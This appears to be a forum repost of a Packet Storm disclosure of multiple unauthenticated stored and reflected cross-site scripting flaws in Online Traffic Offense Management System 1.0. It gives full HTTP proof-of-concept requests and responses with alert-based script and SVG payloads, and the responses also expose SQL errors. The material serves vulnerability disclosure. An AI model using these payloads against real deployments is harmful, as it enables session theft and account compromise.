Online Traffic Offense Management System 1.0 Cross Site Scripting

#383
Topic created · 1 Posts · 7 Views
  • Online Traffic Offense Management System version 1.0 suffers from persistent and reflective cross site scripting vulnerabilities.
    MD5 | 45b6e51d7759554a91843bef106f82e3
    Download

    # Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)  
    # Date: 07/10/2021  
    # Exploit Author: Hubert Wojciechowski  
    # Contact Author: [[email protected]](/cdn-cgi/l/email-protection)  
    # Vendor Homepage: https://www.sourcecodester.com  
    # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html  
    # Version: 1.0  
    # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
    ### XSS Stored and XSS Reflected  
    # All requests can be sent by both an authenticated and a non-authenticated user  
    # XSS Stored - example vulnerable pages and parameters:  
    * The entire application is susceptible to Stored XSS vulnerabilities, below are examples of pages and parameters  
    * We can upload SVG file from XSS to all places in webapp  
    * We can add evil code from admin account, regular user account and unauthenticated - we needs only request  
    * http://localhost/traffic_offense/admin/?page=user  
    Parameters:  
    - firstname  
    - lastname  
    - user image - svg file with javascript code - XSS  
    * http://localhost/traffic_offense/classes/Master.php?f=save_offense_record  
    Parameters:  
    - date_created  
    - ticket_no  
    - officer_id  
    - officer_name  
    - status  
    - remarks  
    - SVG file with javascript code - XSS   
    * All application is vulnerable  
    # XSS Reflected - example vulnerable pages and parameters:  
    * http://localhost/traffic_offense/admin/?page  
    Parameters:  
    - page  
    * http://localhost/traffic_offense/classes/Login.php  
    Parameters:  
    - username  
    - password  
    * http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]  
    Parameters:  
    - id  
    * http://localhost/traffic_offense/classes/Master.php  
    Parameters:  
    - id  
    * http://localhost/traffic_offense/classes/Users.php  
    Parameters:  
    - id  
    -----------------------------------------------------------------------------------------------------------------------  
    # POC  
    -----------------------------------------------------------------------------------------------------------------------  
    ## Example 1 - XSS Reflected  
    # Request using POST method, payload is in the parameter value id  
    POST /traffic_offense/classes/Users.php?f=save HTTP/1.1  
    Host: localhost  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
    Accept: */*  
    Accept-Language: pl,en-US;q=0.7,en;q=0.3  
    Accept-Encoding: gzip, deflate  
    X-Requested-With: XMLHttpRequest  
    Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583  
    Content-Length: 1061  
    Origin: http://localhost  
    Connection: close  
    Referer: http://localhost/traffic_offense/admin/?page=user  
    Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o  
    Sec-Fetch-Dest: empty  
    Sec-Fetch-Mode: cors  
    Sec-Fetch-Site: same-origin  
    -----------------------------21986352462593413643786432583  
    Content-Disposition: form-data; name="id"  
    13<script>alert(1)</script>37  
    -----------------------------21986352462593413643786432583  
    Content-Disposition: form-data; name="firstname"  
    hacked  
    [...]  
    -----------------------------------------------------------------------------------------------------------------------  
    # Response  
    HTTP/1.1 200 OK  
    Date: Thu, 07 Oct 2021 01:05:26 GMT  
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
    X-Powered-By: PHP/7.4.23  
    Expires: Thu, 19 Nov 1981 08:52:00 GMT  
    Cache-Control: no-store, no-cache, must-revalidate  
    Pragma: no-cache  
    Access-Control-Allow-Origin: *  
    Content-Length: 186  
    Connection: close  
    Content-Type: text/html; charset=UTF-8  
    UPDATE users set  firstname = 'sdasfd'  ,  lastname = 'fdxfd'  ,  username = 'test2'  ,  `password` = 'ad0234829205b9033196ba818f7a872b'  where id = 13<script>alert(1)</script>37  
    -----------------------------------------------------------------------------------------------------------------------  
    # Request using GET method, payload is in the parameter value id  
    GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1  
    Host: localhost  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
    Accept: */*  
    Accept-Language: pl,en-US;q=0.7,en;q=0.3  
    Accept-Encoding: gzip, deflate  
    X-Requested-With: XMLHttpRequest  
    Connection: close  
    -----------------------------------------------------------------------------------------------------------------------  
    # Response  
    HTTP/1.1 200 OK  
    Date: Thu, 07 Oct 2021 05:28:35 GMT  
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
    X-Powered-By: PHP/7.4.23  
    Expires: Thu, 19 Nov 1981 08:52:00 GMT  
    Cache-Control: no-store, no-cache, must-revalidate  
    Pragma: no-cache  
    Access-Control-Allow-Origin: *  
    Content-Length: 7893  
    Connection: close  
    Content-Type: text/html; charset=UTF-8  
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1  
    SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37'' <br />  
    [...]  
    -----------------------------------------------------------------------------------------------------------------------  
    ## Example 2  
    # XSS Stored  
    # Save JS payload in user profile and add SVG file from vuln script  
    POST /traffic_offense/classes/Users.php?f=save HTTP/1.1  
    Host: localhost  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
    Accept: */*  
    Accept-Language: pl,en-US;q=0.7,en;q=0.3  
    Accept-Encoding: gzip, deflate  
    X-Requested-With: XMLHttpRequest  
    Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102  
    Content-Length: 4304  
    Origin: http://localhost  
    Connection: close  
    Referer: http://localhost/traffic_offense/admin/?page=user  
    Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o  
    Sec-Fetch-Dest: empty  
    Sec-Fetch-Mode: cors  
    Sec-Fetch-Site: same-origin  
    -----------------------------85748650716762987124528102  
    Content-Disposition: form-data; name="id"  
    1  
    -----------------------------85748650716762987124528102  
    Content-Disposition: form-data; name="firstname"  
    admin"/><img src=x onmouseover=alert(1)>  
    -----------------------------85748650716762987124528102  
    Content-Disposition: form-data; name="lastname"  
    admin"/><img src=x onmouseover=alert(1)>  
    -----------------------------85748650716762987124528102  
    Content-Disposition: form-data; name="username"  
    admin  
    -----------------------------85748650716762987124528102  
    Content-Disposition: form-data; name="password"  
    admnin123  
    -----------------------------85748650716762987124528102  
    Content-Disposition: form-data; name="img"; filename="xss.svg"  
    Content-Type: image/svg+xml  
    [...]SVG PAYLOAD[...]  
    -----------------------------------------------------------------------------------------------------------------------  
    # Response  
    HTTP/1.1 200 OK  
    Date: Thu, 07 Oct 2021 05:31:29 GMT  
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
    X-Powered-By: PHP/7.4.23  
    Expires: Thu, 19 Nov 1981 08:52:00 GMT  
    Cache-Control: no-store, no-cache, must-revalidate  
    Pragma: no-cache  
    Access-Control-Allow-Origin: *  
    Content-Length: 1  
    Connection: close  
    Content-Type: text/html; charset=UTF-8  
    1  
    -----------------------------------------------------------------------------------------------------------------------  
    # Request download new user data  
    GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1  
    Host: localhost  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
    Accept-Language: pl,en-US;q=0.7,en;q=0.3  
    Accept-Encoding: gzip, deflate  
    Connection: close  
    -----------------------------------------------------------------------------------------------------------------------  
    # Response  
    HTTP/1.1 200 OK  
    Date: Thu, 07 Oct 2021 05:42:04 GMT  
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
    X-Powered-By: PHP/7.4.23  
    Expires: Thu, 19 Nov 1981 08:52:00 GMT  
    Cache-Control: no-store, no-cache, must-revalidate  
    Pragma: no-cache  
    Access-Control-Allow-Origin: *  
    Connection: close  
    Content-Type: text/html; charset=UTF-8  
    Content-Length: 24719  
    [...]  
    <div class="form-group col-6">  
    <label for="name">First Name</label>  
    <input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>  
    </div>  
    <div class="form-group col-6">  
    <label for="name">Last Name</label>  
    <input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>  
    </div>  
    [...]  
    <div class="form-group col-6 d-flex justify-content-center">  
    <img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail">  
    </div>  
    [...]  
    

    Source: packetstormsecurity.com

Log in to reply